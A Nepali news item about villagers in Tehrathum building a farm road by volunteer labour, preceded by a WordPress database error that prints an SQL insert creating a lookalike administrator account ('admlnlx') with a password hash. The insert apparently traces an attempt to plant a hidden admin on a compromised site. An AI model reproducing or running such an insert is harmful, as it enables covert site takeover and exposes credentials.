WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhNtGW89ZYyTsfgke/JuztvtIjxj1T/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 00:54:05', '', 'admlnlx', 'admlnlx')
तेह्रथुम, माघ २७ –
गाउँमा मोटर बाटो निर्माण गर्न कहीँकतैबाट बजेट उपलब्ध नभएपछि पन्चकन्या–९ फूलबारीका बासिन्दाले श्रमदानबाटै सडक निर्माण थालेका छन् ।
गाविस, जिल्ला विकास समिति र अन्य निकायबाट सडक खन्न बजेट उपलब्ध नभएपछि यहाँका बासिन्दाले श्रमदानबाटै सडक निर्माण सुरु गरेका स्थानीय नारायण श्रेष्ठले बताउनुभयो । “धेरैतिर माग गरियो, तर कसैले सुनेनन,” उहाँले भन्नुभयो । सडक नहुँदा गाउँमा खाद्यान्नलगायत सामग्री ढुवानी गर्न तथा गाउँमा उत्पादन भएको वस्तु अन्यत्र पठाउन गाह्रो भएको छ । फूलबारीमा ३० घर परिवारको बसोबास रहेको छ । महिनाको पहिलो र तेस्रो शनिबार श्रमदान गर्ने गरिएको स्थानीय कुलबहादुर श्रेष्ठ बताउनुहुन्छ ।
अहिले करिब दुई किलोमिटर सडक निर्माण भइरहेको छ । निर्माण थालिएको डुम्रिबोटे, फूलबारी हुँदै फयाक जोड्ने सो कृषि सडक श्रमदानबाटै निर्माण गर्ने स्थानीयले बताएका छन् । सडक निर्माणपछि फूलबारीबाट सदरमुकाम म्याङलुङ तथा शुक्रबारे बजार आवतजावत गर्न सहज हुनेछ । – रासस